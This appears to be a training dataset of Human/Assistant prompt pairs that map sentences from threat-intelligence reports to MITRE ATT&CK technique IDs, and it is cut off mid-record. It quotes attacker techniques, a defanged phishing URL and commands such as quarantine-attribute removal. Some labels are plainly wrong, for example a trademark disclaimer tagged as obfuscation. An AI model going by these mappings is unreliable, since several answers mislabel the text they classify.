Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater has used HTTP for C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Large botnets can generate a significant amount of traffic from systems spread across the global internet.### Assistant: T1499: Endpoint Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mustang Panda has used a legitimately signed executable to execute a malicious payload within a DLL file.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,More_eggs has used an RC4-based encryption method for its C2 communications.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as IoT or embedded systems.### Assistant: T1037: Boot or Logon Initialization Scripts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HotCroissant has the ability to retrieve a list of files in a given directory as well as drives and drive types.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Threat Group-3390 ran a command to compile an archive of file types of interest from the victim user's directories.### Assistant: T1119: Automated Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mustang Panda has stored collected credential files in c:\windows\temp prior to exfiltration.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kinsing has searched bash_history for credentials.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This method typically requires administrative level access to the device.### Assistant: T1601: Modify System Image" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT39 has packed tools with UPX, and has repacked a modified version of Mimikatz to thwart anti-virus detection.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWRUNER may collect process information by running tasklist on a victim.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WellMess can identify the IP address and user domain on the target machine.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HTTPBrowser has used DNS for command and control.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Targeting may be specific to a desired victim set or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.### Assistant: T1195: Supply Chain Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Message 3: Headers Received: by mailcenter.support Sender Mercator Institute for China Studies Subject Authoritarian advance Responding to Chinas growing political influence in Europe Body Content and images included within the e-mail body were a direct copy of the following MERICS report: https://www.merics.org/sites/default/files/2018-02/GPPi_MERICS_Authoritarian_Advance_2018_1.pdf Notes The hyperlinked text Click here to download the report within the e-mail body lead to a malicious RTF document located at the URL hxxp://www.mericcs.org/GPPi_MERICS_Authoritarian_Advance_2018_1Q.doc### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SombRAT can use the getprocesslist command to enumerate processes on a compromised host.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may “pass the hash” using stolen password hashes to move laterally within an environment, bypassing normal system access controls.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Caterpillar WebShell has a module to use a port scanner on a system.### Assistant: T1046: Network Service Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Proton captures the content of the desktop with the screencapture binary.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Another Lazarus Group malware sample XORs C2 traffic.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cannon can download a payload for execution.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TA459 has exploited Microsoft Word vulnerability CVE-2017-0199 for execution.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 also created a scheduled task to maintain SUNSPOT persistence when the host booted during the 2020 SolarWinds intrusion.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WellMess can use junk data in the Base64 string for additional obfuscation.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may search in different closed databases depending on what information they seek to gather.### Assistant: T1597: Search Closed Sources" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also delete the ConsoleHost_history.txt file or edit its contents to hide PowerShell commands they have run.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If installing itself as a service fails, Elise instead writes itself as a file named svchost.exe saved in %APPDATA%\Microsoft\Network.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leafminer infected victims using JavaScript code.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ke3chang has used Mimikatz to generate Kerberos golden tickets.### Assistant: T1558: Steal or Forge Kerberos Tickets" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OLE ### Assistant: T1559: Inter-Process Communication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The credentials appear to have been stolen via multiple techniques, including using post-exploition password recovery tools such as MimiKatz or its variant ZhuMimiKatz### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also seek and target DNS misconfigurations/leaks that reveal information about internal networks.### Assistant: T1596: Search Open Technical Databases" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,JSS Loader can download and execute JavaScript files.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Psylo has commands to enumerate all storage devices and to find all files that start with a particular string.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Additionally, Lazarus Group malware SHARPKNOT disables the Microsoft Windows System Event Notification and Alerter services.. Night Dragon has disabled anti-virus and anti-spyware tools in some instances on the victim’s machines.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FELIXROOT collects a list of running processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Users may be subjected to social engineering to get them to open a file that will lead to code execution.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remsec can obtain information about the current user.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly 2.0 dropped and executed SecretsDump to dump password hashes.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWRUNER may collect information on the victim's anti-virus software.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Malicious Component Object Model objects may also be registered and loaded in safe mode.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The message sent to the C2 will be “file is deleted.” if successful or “file is not deleted.” if unsuccessful### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OilRig has used macros to deliver malware such as QUADAGENT and OopsIE.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT19 used Regsvr32 to bypass application control techniques.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete logs keystrokes from the victim’s machine.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has researched software code to enable supply-chain operations, most notably for the 2017 NotPetya attack.### Assistant: T1592: Gather Victim Host Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has obtained and used tools such as BloodHound, Cobalt Strike, Mimikatz, and PsExec.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN6 has used PowerShell to gain access to merchant's networks, and a Metasploit PowerShell module to download and execute shellcode and to set up a local listener.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A BlackEnergy 2 plug-in uses WMI to gather victim host details.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 has used search order hijacking to execute malicious payloads, such as Winnti RAT.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Available information generally includes name, security group, and additional metadata including sensitive data such as credentials and UserData scripts that may contain additional secrets.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Agent Tesla has the capability to kill any running analysis processes and AV software.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Control Panel items can be executed directly from the command line, programmatically via an application programming interface call, or by simply double-clicking the file.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TG-3390 has used additional web shells containing similarly formatted passwords### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Typically, management services over commonly used ports are used when password spraying.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HyperStack can connect to the IPC$ share on remote machines.### Assistant: T1559: Inter-Process Communication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 used compromised credentials to log on to other systems.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A Gamaredon Group file stealer can transfer collected files to a hardcoded C2 server.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Epic compresses the collected data with bzip2 before sending it to the C2 server.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team's plainpwd tool is a modified version of Mimikatz and dumps Windows credentials from system memory.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lokibot has the ability to discover the computer name and Windows product name/version.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT3 has been known to brute force password hashes to be able to leverage plain text credentials.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OopsIE checks for information on the CPU fan, temperature, mouse, hard disk, and motherboard as part of its anti-VM checks.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,On occasions, the phishing emails contained links to external domains to download the first stage, and sometimes the first stage was attached to the email itself### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turian can retrieve system information including OS version, memory usage, local hostname, and system adapter information.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BackdoorDiplomacy has obtained and used leaked malware, including DoublePulsar, EternalBlue, EternalRocks, and EternalSynergy, in its operations.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RainyDay has the ability to capture screenshots.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Patchwork scanned the “Program Files” directories for a directory with the string “Total Security” .### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If the Trojan does not have root privileges to enable its automatic launch, it creates the “~/.config/autostart/dbus-inotifier.desktop” file with the following contents: [Desktop Entry] Type=Application Exec=/home/user/.config/dbus-notifier/dbus-inotifier Name[en_EN]=system service d-bus notifier Name=system service d-bus notifier Comment[en_EN]= Comment= “/home/user/” stands here for the environment variable HOME### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OSX/Shlayer can masquerade as a Flash Player update.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use steganography techniques in order to prevent the detection of hidden information.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,XCSSET searches firewall configuration files located in /Library/Preferences/ and uses csrutil status to determine if System Integrity Protection is enabled.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,China Chopper's server component can spider authentication portals.### Assistant: T1046: Network Service Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SideTwist can embed C2 responses in the source code of a fake Flickr webpage.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32's backdoor has exfiltrated data using the already opened channel with its C&C server.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, on a Windows system adversaries may attempt to infer the language of a system by querying the registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Nls\Language or parsing the outputs of Windows API functions GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetKeyboardLayoutList and GetUserDefaultLangID.### Assistant: T1614: System Location Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may bridge network boundaries by compromising perimeter network devices.### Assistant: T1599: Network Boundary Bridging" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Astaroth collects data in a plaintext file named r1.log before exfiltration.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The remote host is then infected by using the compromised credentials to schedule a task on remote machines that executes the malware.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OSX_OCEANLOTUS.D uses the command xattr -d com.apple.quarantine to remove the quarantine file attribute used by Gatekeeper and Notarization checks.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework., net share### Assistant: T1135: Network Share Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Creating processes with a different token may require the credentials of the target user, specific privileges to impersonate that user, or access to the token to be used or Make and Impersonate Token.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 used fsutil to check available free space before executing actions that might create large files on disk.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BabyShark has downloaded additional files from the C2.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Common methods used by adversaries include replacing accessibility feature binaries or pointers/references to these binaries in the Registry.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ursnif has used HTTP POSTs to exfil gathered information.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Clop has checked the keyboard language using the GetKeyboardLayout function to avoid installation on Russian-language or other Commonwealth of Independent States-language machines; it will also check the GetTextCharset function.### Assistant: T1614: System Location Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has staged archives of collected data on a target's Outlook Web Access server.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 1: Configuration file that adds new C2 server and forces the data-stealing backdoor to use it Figure 2: Configuration file that adds TCP tunnels and records desktop video Command and Control CARBANAK communicates to its C2 servers via pseudo-HTTP or a custom binary protocol### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pasam creates a backdoor through which remote attackers can upload files.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 has used WinRM via PowerShell to execute command and payloads on remote hosts.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,JCry has achieved execution by luring users to click on a file that appeared to be an Adobe Flash Player update installer.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Trojan.Karagany can capture keystrokes on a compromised host.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This can be complemented by restricting direct internet access to the company’s internal networks while using proxies to access external resources### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT34 has used a keylogging tool called KEYPUNCH.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If it detects that it is, it will exit.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ThiefQuest uploads files via unencrypted HTTP.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This may be done in a number of ways, including inserting malicious script into web pages or other user controllable web content such as forum posts.### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The default lifetime of a SAML token is one hour, but the validity period can be specified in the NotOnOrAfter value of the conditions ... element in a token.### Assistant: T1606: Forge Web Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Nomadic Octopus as attempted to lure victims into clicking on malicious attachments within spearphishing emails.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Magic Hound has lured victims into executing malicious files.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Valak can determine if a compromised host has security products installed.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may inject malicious code into processes via thread local storage callbacks in order to evade process-based defenses as well as possibly elevate privileges.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RemoteCMD can execute commands remotely by creating a new service on the remote system .### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also available but is not created by default on Windows Vista and newer.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,With the exception of the ‘Speed’ method previously mentioned, the names of the methods called in this chain appear to be fairly random, as seen in the following list:   ETransaksi.Speed ETransaksi.diomadnfagaghagh ETransaksi.fjcsERIfjfiojsGHIsdifjksi ETransaksi.gsgjIDJIGJIGJIGJIFDOSpl ETransaksi.FJaioefgkaoeK   The last two methods in the chain carry out a majority of the first payload’s functionality### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly.### Assistant: T1185: Browser Session Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,XTunnel is capable of accessing locally stored passwords on victims.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In response to this request, the C2 server responds with a Base64-encoded RSA public key (seen in Figure 12)### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Magic Hound has established email accounts using fake personas for spearphishing operations.### Assistant: T1585: Establish Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tropic Trooper used pr and an openly available tool to scan for open ports on target systems.### Assistant: T1046: Network Service Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These Honeybee documents did not contain any specific lures, rather variations of a “not compatible” message attempting to convince the user to enable content### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SMOKEDHAM has used whoami commands to identify system owners.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Taidoor can use GetCurrentProcessId for process discovery.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bundlore has attempted to get users to execute a malicious .app file that looks like a Flash Player update.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SLOTHFULMEDIA has taken a screenshot of a victim's desktop, named it ""Filter3.jpg"", and stored it in the local directory.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RTM can attempt to run the program as admin, then show a fake error message and a legitimate UAC bypass prompt to the user in an attempt to socially engineer the user into escalating privileges.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, or setting up a command and control channel on the host.### Assistant: T1611: Escape to Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Nerex creates a Registry subkey that registers a new service.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RedLeaves can use HTTP over non-standard ports, such as 995, for C2.### Assistant: T1571: Non-Standard Port" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PUNCHBUGGY has used PowerShell to decode base64-encoded assembly.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ShimRat can sleep when instructed to do so by the C2.### Assistant: T1029: Scheduled Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Maze operators have used VirtualBox and a Windows 7 virtual machine to run the ransomware; the virtual machine's configuration file mapped the shared network drives of the target company, presumably so Maze can encrypt files on the shared drives as well as the local machine.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This can allow an adversary a path to access the cloud or container APIs, exploit container host access via Escape to Host, or take advantage of weak identity and access management policies.### Assistant: T1190: Exploit Public-Facing Application" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bazar can attempt to overload sandbox analysis by sending 1550 calls to printf.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,None of the known documents contain a lure image or message to instruct the recipient to click the Enable Content button necessary to run the macro, as seen in Figure 1### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OLDBAIT collects credentials from Internet Explorer, Mozilla Firefox, and Eudora.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Subfolders in this directory categorize logs by their related functions, such as: * /var/log/messages:: General and system-related messages * /var/log/secure or /var/log/auth.log: Authentication logs * /var/log/utmp or /var/log/wtmp: Login records * /var/log/kern.log: Kernel logs * /var/log/cron.log: Crond logs * /var/log/maillog: Mail server logs * /var/log/httpd/: Web server access and error logs Proton removes logs from /var/logs and /Library/logs.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The ""ZJ"" variant of BACKSPACE allows ""ZJ link"" infections with Internet access to relay traffic from ""ZJ listen"" to a command server.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When the technique is performed on the running operating system in memory and not on the stored copy, this technique will not survive across reboots.### Assistant: T1601: Modify System Image" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Peppy can use HTTP to communicate with C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MAPIGET steals email still on Exchange servers that has not yet been archived.### Assistant: T1114: Email Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NavRAT uses tasklist /v to check running processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,njRAT can capture screenshots of the victim’s machines.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may gain access to a system through a user visiting a website over the normal course of browsing.### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rising Sun used dynamic API resolutions to various Windows APIs by leveraging LoadLibrary and GetProcAddress.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may target user email to collect sensitive information.### Assistant: T1114: Email Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,menuPass uses scripts to enumerate IP ranges on the victim network.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Epic uses the rem reg query command to obtain values from Registry keys.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OilRig used the Plink utility and other tools to create tunnels to C2 servers.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ADVSTORESHELL can run Systeminfo to gather information about the victim.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 attempted to masquerade their files as popular anti-virus software.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team used a backdoor which could execute a supplied DLL using rundll32.exe.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RegDuke can use Dropbox as its C2 server.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When it is necessary to do this for a large flood of packets, the computational requirements can cause the server to become sluggish and/or unresponsive, due to the work it must do to eliminate the rogue ACK packets.### Assistant: T1499: Endpoint Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,gh0st RAT has added a Registry Run key to establish persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TAINTEDSCRIBE can download additional modules from its C2 server.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Information about networks may also be exposed to adversaries via online or other accessible data sets .### Assistant: T1590: Gather Victim Network Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options debuggers.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Attor encrypts collected data with a custom implementation of Blowfish and RSA ciphers.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team's CredRaptor tool can collect saved passwords from various internet browsers.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When documents, applications, or programs are downloaded an extended attribute called com.apple.quarantine can be set on the file by the application performing the download.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Code repositories are often accessible via an API .### Assistant: T1567: Exfiltration Over Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Group has sent malicious Word OLE compound documents to victims.### Assistant: T1559: Inter-Process Communication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 used Net to use Windows' hidden network shares to copy their tools to remote machines for execution.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Emotet has been delivered by phishing emails containing links.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EnvyScout has been executed through malicious files attached to e-mails.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It requires the remote Registry service to be running on the target system.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PLATINUM has transferred files using the Intel® Active Management Technology Serial-over-LAN channel.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters .### Assistant: T1568: Dynamic Resolution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zebrocy has a command to delete files and directories.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AppleScripts do not need to call osascript to execute, however.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Daserf hides collected data in password-protected .rar archives.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mosquito leverages the CreateProcess and LoadLibrary calls to execute files with the .dll and .exe extensions.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kessel's configuration is hardcoded and RC4 encrypted within the binary.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN8 has used dsquery and other Active Directory utilities to enumerate hosts; they have also used nltest.exe /dclist to retrieve a list of domain controllers.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Brute forcing credentials may take place at various points during a breach.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Non-standard data encoding schemes may be based on or related to standard data encoding schemes, such as a modified Base64 encoding for the message body of an HTTP request.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Siloscape is executed after the attacker gains initial access to a Windows container using a known vulnerability.### Assistant: T1190: Exploit Public-Facing Application" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Finally, Reaver.v2 will execute the ‘~Update.lnk’ file in a new process, thus loading the recently dropped malicious CPL file### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK 